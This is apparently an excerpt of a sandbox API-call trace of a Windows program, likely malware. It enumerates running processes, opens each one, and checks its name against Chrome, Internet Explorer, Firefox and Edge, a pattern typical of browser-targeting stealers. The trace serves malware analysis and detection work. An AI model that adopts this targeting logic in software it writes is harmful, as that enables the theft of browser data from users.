	[0238.146] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.147] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x7d08
	[0238.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.147] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.147] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.147] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.148] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.148] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.149] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x7d0c
	[0238.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.149] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.149] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.150] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.156] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.157] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.158] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x7d10
	[0238.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.158] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.158] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.159] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.160] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.160] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0238.161] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x7d14
	[0238.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.161] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0238.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.162] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.162] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0238.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.163] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.163] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.164] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x7d18
	[0238.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.164] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.165] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.166] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.189] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.190] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0238.191] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x7d1c
	[0238.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.191] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.192] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.192] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.193] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.193] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0238.196] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x7d20
	[0238.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.196] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0238.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.196] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.200] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0238.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.200] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.201] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.202] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x7d24
	[0238.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.202] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.203] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.203] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.204] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.204] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0238.205] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x7d28
	[0238.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.205] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0238.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.206] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.206] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0238.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.207] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.207] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0238.208] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x7d2c
	[0238.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.209] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0238.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.209] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.210] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0238.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.210] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.210] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0238.212] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x7d30
	[0238.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.212] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0238.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.212] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.214] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0238.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.215] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.215] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0238.216] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x7d34
	[0238.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.216] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0238.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.217] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.217] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0238.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.218] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.218] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0238.219] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0238.219] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0238.221] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x7d38
	[0238.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.221] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0238.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.222] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.223] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0238.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.224] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.224] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0238.225] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x7d3c
	[0238.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.226] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0238.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.226] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.227] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0238.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.227] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.227] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0238.234] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x7d40
	[0238.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.234] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0238.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.234] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.235] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0238.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.235] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.236] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0238.237] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x7d44
	[0238.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.237] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0238.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.238] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.238] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0238.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.239] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.239] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0238.240] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x7d48
	[0238.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.240] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0238.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.241] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.242] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0238.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.243] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.243] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0238.245] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x7d4c
	[0238.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.245] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0238.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.246] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.246] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0238.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.247] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.247] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0238.248] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x7d50
	[0238.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.248] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0238.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.249] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.249] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0238.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.250] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.251] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0238.252] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x7d54
	[0238.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.252] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0238.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.252] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.253] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0238.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.254] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.260] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0238.261] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x7d58
	[0238.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.262] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0238.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.262] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.263] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0238.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.263] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.263] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0238.264] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x7d5c
	[0238.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.264] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0238.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.265] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.265] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0238.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.266] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.266] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0238.267] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x7d60
	[0238.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.267] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0238.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.268] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.268] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0238.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.269] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.270] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0238.271] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x7d64
	[0238.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.271] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0238.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.272] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.273] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0238.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.273] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.274] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
